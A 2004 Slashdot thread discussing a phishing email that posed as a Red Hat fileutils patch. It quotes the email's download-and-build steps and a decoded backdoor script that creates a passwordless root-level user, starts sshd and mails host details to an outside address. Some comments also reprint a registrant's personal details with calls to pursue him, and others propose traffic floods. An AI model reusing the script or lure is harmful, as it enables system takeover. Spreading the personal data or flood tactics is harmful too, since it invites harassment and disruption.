Beware 'Fedora-Redhat' Fake Security Alert
rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.
Original issue date: October 20, 2004
z or directly here. ./inst
Last revised: October 20, 2004
Source: RedHat
A complete revision history is at the end of this file.
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.g
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
*
Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
Adopting dumb users had to bring the ones exploiting the stpidity with them. Even tho running as a non-admin should help againts these things, there is no cure against security holes between the chair and the keyboard.
The system had the verbosity of HTML combined with all the readability of compiled assembly viewed as bitmap images
It's fishing, it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.
I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.
Stay tuned.
Don't most Fedora people use yum to keep their systems up to date? I don't think many Fedora/Red Hat admins would fall for this.
[Querying whois.internic.net]
[Redirected to whois.melbourneit.com]
[Querying whois.melbourneit.com]
[whois.melbourneit.com]
Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES
Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............
Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com
Oh, no! You have walked into the slavering fangs of a lurking grue!
Why not just use the real link and slashdot their site into oblivion!
Red Hat's reply to this issue is pretty straight-forward. They've already taken all of the steps to properly sign their real updates, and this should stand out as a fake because it lacks all of those digital signatures.
However, what good is that against Joe User who falls for the bait and things the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals" and since they don't see any red flags indicating that this is bogus.
It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.
It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of windows users, but as the audience of Linux is mostly tech-savy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?
Those who can make you believe absurdities can make you commit atrocities. - Voltaire
Running untrusted code can result in system compromise.
Everyone checks the gpg signatures right?
Now if each time when someone tries this sort of thing gets their server posted here on slashdot, we could actually do something good with the slashdot effect and put their server up in smoke before much damage is done. :-D
home
or better yet, it Microsoft paid the Yankee group to do it for them, and then do an "independent study" on it.
Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).
________
Entranced by anime since late summer 2001 and loving it ^_^
I'm sure glad I'm using windows!
Identifying the system. This may take up to 2 minutes. Please wait... /etc/ssh/ssh_host_key /etc/ssh/ssh_host_rsa_key /etc/ssh/ssh_host_dsa_key
adduser: No more than two names.
passwd: Unknown user bash
Could not load host key:
Could not load host key:
Could not load host key:
Disabling protocol version 1. Could not load host key.
Disabling protocol version 2. Could not load host key.
sshd: no hostkeys available -- exiting.
System looks OK. Proceeding to next step.
Patching "ls": ###########
Patching "mkdir": ##########
System updated and secured successfully. You may erase these files.
Dammit why does Linux have to be so complicated, I mean damn you have to compile your own viruses and everything!!!!
Debian has been weeding out incompetent users with its "impossible to use" installer for years.
It keeps the "Mandrake Crew" off of the debian-users lists.
If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.
How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension.
(Disclosure: I wrote the plugin. :) )
But I am running SUSE! Am I adviced in similar fashion? Perhaps I too should applying patch lest SUSE found vulnerability also? Thankyou to www.fedora-redhat.com for adviced me in this helpful manner against remote attackers!
It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.
I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
View inst.c
From shc's manpage:
Definitly doing something then, at least viewing the parent post.
Here is what it does.
Dogg
Looks like I misinterpreted the code. The rc4 stuff is part of the shc "script compiler" output that decodes the actual shell script. fileutils-patch.bin is just a mis-named redhat RPM that inst doesn't appear to use at all.
0 1 - just my two bits
The funniest part is that the code (a shell script compiled into C code, then into a binary, to obfuscate its purpose) failed miserably on my test systems, both Knoppix AND Fedora Core 2. It spat out a bunch of errors which completely revealed the fact that it was trying to add a user, start sshd, etc. C'mon, if you're gonna terrorize the Linux world, at least do it right!
The script is encoded into the text variable in the source. The key part of the script is this:
/tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null /tmp/mama
echo "Inca un root frate belea: " >>
adduser -g 0 -u 0 -o bash >>
passwd -d bash >>
ifconfig >>
uname -a >>
uptime >>
sshd >>
echo "user bash stii tu" >>
cat
rm -rf
(I'd post the whole script but the lameness filter won't let me)
Create a user named bash, no password
grab the ip and uptime, start ssh
mail the results
- MbM
Everyone should email yahoo via netblockadmin@yahoo-inc.com and ask them to take the site down.
>md5sum fileutils-1.0.6.patch.tar.gz
68349c219d941209af8f7c968b89d622 *fileutils-1.0.6.patch.tar.gz
So you can be sure you're getting the real fake patch.
The shareholder is always right.
Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.
Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.
Here's what I do: Bitty Browser & Andromeda
Whoever is behind this certainly seems to be doing a very sloppy job of it. Yahoo, Melbourne IT, Stanford, hosting at "everyone.net"; hardly a who's who of dodgy companies and "bullet proof" service providers, is it? Frankly, I'm expecting to be reading a Slashdot story about a bust by the end of the week, and that's being generous.
UNIX? They're not even circumcised! Savages!
But slashdotting the misused domain will let the company hosting the fraudulent crap know that they should vet their users a bit more carefully, and let them know that they're hosting a *BIG* problem and may need to review their overal customer contracts to prevent this in the future. It also helps give the company incentive to prosecute, or at least sue, the jerk who set them up for this.
If the Antivirus companies were responsible, they'd have done a better job.
If Microsoft was responsible, they wouldn't have included any source code.
If SCO was responsible, they'd have included sourcecode and then sued you for running it
All things taken into consideration, I'm with 'other' on this one
Ripping an new rectum in the fabric of spacetime.
(Mind you, I'm no better. First time I got a computer virus, when I was running MSDOS, my first reaction was to run a binary diff against a clean version of the file, and disassemble the result to see what it did. Do you know if there's a cure for this?)
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.
Malike Bamiyi wanted my assistance.
Red Hat should simply rename the file on their site, change the links to it, and then replace it with a "THIS IS FRAUD" PNG.
TO BUY A NEW CAR WOULD MAKE YOU SEXUALLY ATTRACTIVE.
Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.
.mil and .gov sites. :o)
If you do, make sure the IP addresses are of
without bothering to RTFA, and mistakenly think that it's a legit patch,
Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.
I looked at the whois... fedora-redhat.com reported:
Raymond Jackson
224 Cedar Avenue
New York, NY 95301.
209 899-4533 However, 95301 is an Atwater, CA zip code.
So, I looked up Raymond Jackson in Atwater. What did I find?
Raymond Jackson
224 Cedar Avenue
Atwater, CA 95301
209 358 8510.
Looks like he did a crappy job of disguising his identity. Go get him!!!
Someone on the full-disclosure has posted a good analysis of what this is. Have a look at this thread.
Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary.
This is an unfortunate reality today. Back in my day, the only way to be a real Linux guru was to compile and build your system from scratch using a dev box.
Nowadays, any average person can easily install Linux and instantly become "31337". Today's typical Linux user has no idea what half the files on his system do, or where they came from. Unforunately, the majority of you with moderator points fall into this category so my post is doomed!
I would advise those who are new to Linux to visit the Linux From Scratch website and set aside a weekend of learning. There is no better method for gaining useful knowledge regarding the reduction of hard drive clutter and increasiong optimization, and security.
This is an honor virus. Please forward to all your friends, then format your hard drive(s). Thank you.
I feel fantastic, and I'm still alive.
This is a buggy honor virus. Please format your hard drive(s) and then pass it to all your friends.
Thank you.
Free Software: Like love, it grows best when given away.
Been there, done that:
<root@addlebrain.com>: host sitemail.everyone.net[216.200.145.51] said: 554
Recipient Rejected: Not accepting mail for this account : Account
terminated due to violation of user agreement